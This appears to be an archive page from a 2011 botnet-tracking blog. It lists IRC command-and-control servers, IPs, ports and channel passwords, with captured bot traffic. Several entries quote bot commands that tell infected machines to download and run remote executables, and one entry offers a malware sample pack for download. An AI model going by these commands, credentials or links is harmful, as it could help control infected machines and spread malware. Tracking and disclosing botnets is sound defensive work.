Month: November 2011

91.121.100.60(irc botnet hosted in France Ovh Systems)

Uncategorized

Remote Host Port Number 216.146.39.70 80 72.233.89.200 80 91.121.100.60 9595 JOIN #!scan# error PONG 22 MOTD MODE USA|XP|SP2|00|2966|L|3819 +iB-x JOIN #mss# psy PONG 422 PRIVMSG #mss# :[SCAN]: Sequential Port Scan started on 192.168.0.0:1433 with a delay of 6 seconds for 0 minutes using 60 threads. NICK USA|XP|SP2|00|2966|L|3819 USER szjwcb 0 0 :USA|XP|SP2|00|2966|L|3819 USERHOST USA|XP|SP2|00|2966|L|3819 hostingRead more...

dem0002.in(ngrBot hosted in United States Hollywood Exclusive Proxy Llc)

Uncategorized

Big hecker=>big botnet=>easy to trace Same guy named google hf hecker servers used for botnets mostly hosted from razorservers.com USA lol Botnet size estimated around 60-80k Resolved : [dem0002.in] To [70.34.194.26] Resolved : [dem0002.in] To [70.34.196.90] Resolved : [dem0002.in] To [66.199.249.154] Resolved : [dem0002.in] To [70.34.196.146] Other domain in stock for the moment waiting toRead more...

140mb malware samples

Uncategorized

This package contains diferent irc bots,bitcoin miner,banking trojans etc have fun Download: http://3e2a9dd0.ultrafiles.net

av.psybnc.cz(100k ngrBot hosted in France Paris Gandi)

Uncategorized

Saga continues the lamer behind this net(Virus) is changing domain names but still hard for him to be invisible Resolved : [av.psybnc.cz] To [92.243.10.12] Resolved : [av.psybnc.cz] To [92.243.0.109] Resolved : [av.psybnc.cz] To [92.243.27.72] Resolved : [av.psybnc.cz] To [92.243.17.156] Resolved : [av.psybnc.cz] To [92.243.25.164] Other domains used by the lamer: up.a7aneek.net av.shannen.cc 92.243.10.12 5900 PASSRead more...

ccteam.ircnet.co.il(irc botnet hosted in Turkey Istanbul Global Iletisim Hizmetleri A.s)

Uncategorized

Resolved : [ccteam.ircnet.co.il] To [91.93.117.180] Resolved : [ccteam.ircnet.co.il] To [216.210.179.67] ccteam.ircnet.co.il 216.210.179.67 Server: 216.210.179.67:6667 Server Password: Username: epulhw Nickname: cCBot|QWEG Channel: #VNC (Password: xxx) Channeltopic: :@vnc 80 1 203.x.x.x 2 0 Now talking in #VNC Topic On: [ #VNC ] [ @vnc 80 1 203.x.x.x 2 0 ] Topic By: [ asd ] hosting infos:Read more...

sean06.com(ngrBot hosted in Philippines Infravps Network Solutions)

Uncategorized

Resolved : [sean06.com] To [63.223.79.122] Other domains used to control bots: xivo06.com gayy06.com Server: 63.223.79.122:5794 Server Password: Username: qojtcha Nickname: n{DE|XPa}qojtcha Channel: #chan (Password: ngrBot) Channeltopic: :!mdns http://64.37.52.224/tlpu/dominios.txt | !up http://www.hutaszkola.cba.pl/e107_themes/6aosifuaspelugay.exe 735E01E56A2A57BFE146282A09232041 Now talking in #chan Topic On: [ #chan ] [ !mdns http://64.37.52.224/tlpu/dominios.txt | !up http://www.hutaszkola.cba.pl/e107_themes/6aosifuaspelugay.exe 735E01E56A2A57BFE146282A09232041 ] Topic By: [ rockstar ] DownloadRead more...

tc.byinter.net(Aryan bot hosted in Sweden Deepak Mehta Fie)

Uncategorized

tc.byinter.net 46.29.248.104 Server: 46.29.248.104:6667 Server Password: Username: 5405728 Nickname: New{DE-XP-x86}5405728 Channel: #aryan (Password: KCA) Channeltopic: :.download http://www.websells.com/test.exe 1 JOIN #KCA2 KCA #KCA2 :.dwl http://www.websells.com/ngrs.exe #KCA2 CaCa 1320706998 Nickname: n{DE|XPa}ughfqgd Channel: #KCA (Password: KCA) Channeltopic: :!j #X Now talking in #X Topic On: [ #X ] [ !mdns http://www.websells.com/av.txt !mod usbi on ] Topic By: [Read more...

ngme.beecitysearch.com(ngrBot hosted in China Zhejiang Ninbo Lanzhong Network Ltd)

Uncategorized

Domain names used to control bots: ngme.yourwebfind.com NONE ngme.yourwebfind.com.local NONE api.wipmania.com 199.15.234.7 ngme.drwhox.com NONE ngme.drwhox.com.local NONE ngme.babypin.net 60.190.223.150 60.190.222.157 ngme.beecitysearch.com 60.190.222.157 60.190.223.150 Remote Host Port Number 199.15.234.7 80 60.190.222.157 7475 PASS 3v 60.190.223.150 7475 PASS 3v NICK New{US-XP-x86}2778075 USER 2778075 “” “2778075” :2778075 MODE New{US-XP-x86}2778075 +iMm JOIN #3v 3×3 PONG :82A39F53 Now talking in #3vRead more...